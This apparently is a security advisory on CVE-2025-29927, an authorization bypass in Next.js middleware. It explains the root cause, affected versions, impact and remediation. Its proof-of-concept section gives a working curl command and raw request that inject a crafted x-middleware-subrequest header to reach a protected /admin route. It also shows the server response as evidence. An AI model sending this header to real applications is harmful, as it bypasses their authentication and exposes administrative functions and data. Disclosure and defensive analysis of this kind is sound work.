CVE-2025-29927: Next.js Middleware Bypass Vulnerability
1. Introduction & CVE Overview
CVE-2025-29927 is an authorization bypass vulnerability in Next.js that allows attackers to circumvent middleware-based authentication checks. By injecting the internal x-middleware-subrequest header, attackers can force the framework to skip middleware execution entirely, granting unauthorized access to protected routes. This flaw affects applications relying on Next.js middleware for access control, such as admin dashboards or API endpoints.
| Field | Details |
|---|---|
| CVE ID | CVE-2025-29927 |
| Affected Software | Next.js, specifically the middleware runtime's subrequest check. Affected release ranges: 11.1.4 through 12.3.4, 13.0.0 through 13.5.8, 14.0.0 through 14.2.24, and 15.0.0 through 15.2.2 (all inclusive). |
| Attack Vector | Remote, unauthenticated HTTP request with a crafted x-middleware-subrequest header |
| Root Cause | Next.js uses the x-middleware-subrequest header internally as a recursion guard, so that middleware does not run again on subrequests the server makes to itself. Affected releases accepted the header from any client without binding it to anything a client cannot forge, so an external request carrying it was treated as an already-nested subrequest and middleware was skipped. |
| Exploit Status | CONFIRMED |
2. Vulnerability Description
Authorization bypass in Next.js middleware via the x-middleware-subrequest header (affected ranges listed in section 1). The runtime splits the header value on ':' and compares each entry with the name of the compiled middleware module. When enough entries match (five, the recursion limit, in 14.x and 15.x; a single matching entry in older releases), it concludes the request is a nested subrequest that has already passed through middleware and returns early with NextResponse.next(). Because nothing tied the header to the server that was supposed to set it, any unauthenticated client can supply it and skip middleware entirely, along with every authentication, authorization, redirect, rewrite or header-setting step implemented there.
3. Impact
An attacker who can send HTTP requests to the application bypasses every control the middleware enforces: authentication checks, role-based authorization, login redirects, and tenant or geographic restrictions. Administrative dashboards, user-management panels and internal API routes become reachable without credentials, which can lead to data exposure, privilege escalation or account takeover depending on what those routes do. Because the whole middleware is skipped, any other work it performs is lost as well, including security headers such as Content-Security-Policy set there and rewrites or redirects that downstream handlers may assume have already happened. The exposure is worst where middleware is the only access control: the bypass is a single header on an unauthenticated request and needs no prior foothold. Given how widely Next.js is deployed and how commonly middleware is used for exactly this purpose, the flaw is rated critical (CVSS 3.1 base score 9.1) for self-hosted applications on affected versions.
4. Proof of Concept
Exploit Request (the header value must repeat the middleware module name, as the build knows it, at least five times: middleware for a root-level middleware.ts, src/middleware when the file lives under src/; releases before 12.2 used pages/_middleware)
curl -X GET \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
'http://localhost:3000/admin'
Raw Request Object
{
"method": "GET",
"url": "http://localhost:3000/admin",
"headers": {
"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
},
"body": {}
}
5. Server Response Evidence
| Field | Value |
|---|---|
| Status Code | 200 |
| Response Body | <h1>Admin Dashboard</h1><p>This page is protected by middleware.</p> |
| Indicator | Admin Dashboard content loaded without authentication |
6. Screenshots — Exploitation Proof
① BEFORE — Baseline — Home Page
The Next.js application home page, displaying a standard user interface with no visible signs of tampering. Middleware-based authentication is enforced for protected routes, such as the /admin endpoint, but not yet tested.
② BEFORE — Target Endpoint — Before Exploit
The /admin endpoint as accessed without authentication, showing a ‘403 Forbidden’ or login prompt due to middleware-enforced access controls. The page explicitly denies access to unauthorized users, indicating the middleware is functioning as intended.
③ AFTER — After Exploit — Attacker View
The same /admin endpoint after sending a request with the x-middleware-subrequest header, now displaying full administrative functionality without authentication. The middleware bypass is evident as the attacker gains unrestricted access to sensitive controls and data.
7. Remediation
Upgrade to a patched release: 15.2.3, 14.2.25, 13.5.9 or 12.3.5 (or later within each line); the fix stops honouring a client-supplied x-middleware-subrequest header. Where the upgrade cannot be applied immediately, drop the header at the edge before it reaches the Next.js server, for example with proxy_set_header x-middleware-subrequest ""; in Nginx or an equivalent header-removal rule in Apache, a WAF or Cloudflare. Applications hosted on Vercel, and on other platforms that already stripped the header at their edge, were not exposed; self-hosted deployments (next start, Docker images, custom Node servers) are the ones to prioritise. Treat middleware as one layer only: re-validate the session and the caller's role inside the route handlers and server components that serve sensitive data, so that a skipped middleware does not by itself grant access. Finally, alert on any inbound request carrying x-middleware-subrequest, since a legitimate external client never sends it; such a request followed by a 200 on a protected route is evidence of successful exploitation.
